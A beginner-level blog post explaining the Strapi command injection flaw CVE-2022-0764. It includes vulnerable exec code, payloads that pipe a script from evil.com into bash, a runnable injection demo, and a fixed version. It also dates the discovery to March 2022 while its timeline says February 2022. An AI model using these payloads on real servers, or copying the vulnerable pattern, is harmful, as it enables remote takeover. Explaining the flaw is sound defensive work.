If you’re running a website or an app that uses Strapi, be careful! A major vulnerability, CVE-2022-0764, was found that could allow an attacker to run any command they want on your server. In this post, I’ll explain what happened, how it works (including sample code), links to original references, and what you can do to fix it.

What is Strapi?

For those new to the tech, Strapi is an open-source headless CMS built with Node.js. It’s used for building APIs quickly and is popular because it’s flexible and easy to use.

About CVE-2022-0764

In March 2022, researchers found a critical vulnerability in Strapi, specifically in versions before 4.1. It allows an attacker to exploit the admin panel and make the server execute *arbitrary commands*. This means the attacker can do anything your server can do: install malware, steal data, or destroy your service.

- CVE record: NVD - CVE-2022-0764
- Strapi security advisory: GitHub Advisory Database GHSA-993q-x46g-pgrw

How the Exploit Works

The vulnerability is in how Strapi processes user input in the admin panel for plugin installation. When an administrator installs a plugin from the marketplace, Strapi runs a shell command with the plugin’s name as input. *But it doesn’t sanitize the name*, so an attacker who can control this input (for example, via an admin session) could inject malicious commands.

The underlying problem was this kind of pattern:

```javascript
const exec = require('child_process').exec;
// bad: user input is concatenated straight into a shell command string
exec('npm install ' + pluginName, (err, stdout, stderr) => {
  //...
});
```

Here, if pluginName is not properly sanitized, an attacker could pass something malicious like:

strapi-plugin-good; curl http://evil.com/pwn.sh | bash

So the full command becomes:

npm install strapi-plugin-good; curl http://evil.com/pwn.sh | bash

The shell will execute both npm install strapi-plugin-good and the attacker's shell script!

With a payload such as strapi-plugin-fake; curl http://evil.com/payload.sh | bash supplied as the plugin name, the server executes the resulting command, running both the legitimate and the malicious parts. The malicious script from evil.com is executed with the *same privileges as Strapi*, potentially taking over the server.

*Note: In many real-life attacks, hackers combine this vulnerability with social engineering, or chain it with other vulnerabilities, to get admin credentials.*

Here's a simple example (for demonstration only):

```javascript
const { exec } = require('child_process');
// Attacker-controlled "plugin name" carrying an injected command after the ';'
const userPluginName = "strapi-plugin-demo; touch /tmp/hacked";

// Simulate plugin installation: the name is concatenated into a shell command,
// so the shell treats ';' as a command separator and runs `touch` as well
exec('npm install ' + userPluginName, (error, stdout, stderr) => {
  if (error) {
    console.error(`Error: ${error.message}`);
    return;
  }
  console.log(`stdout: ${stdout}`);
});
```


After running, your server will create a file /tmp/hacked, proving code execution!

The patched code escapes or validates the plugin name, or avoids the shell entirely, to prevent command injection:

```javascript
const { execFile } = require('child_process');
const safePluginName = 'strapi-plugin-good'; // a validated name, never raw user input
// Pass arguments as an array so no shell is spawned: a ';' in the name is just a character
execFile('npm', ['install', safePluginName], (err, stdout) => console.log(err ?? stdout));
```

References

- NVD: CVE-2022-0764
- GitHub Advisory Database: GHSA-993q-x46g-pgrw
- Official Strapi Issue
- Strapi changelog

Conclusion

CVE-2022-0764 is a serious vulnerability in Strapi that can let attackers run any command on your server if you’re not patched. Update today and always sanitize inputs in your own Node.js code! If you found this helpful or need more guidance, feel free to reach out.

Stay safe,  
Your Security Buddy


*(This is an exclusive, beginner-friendly summary tailored for easy understanding.)*

Timeline

Published on: 02/26/2022 15:15:00 UTC
Last modified on: 07/22/2022 10:28:00 UTC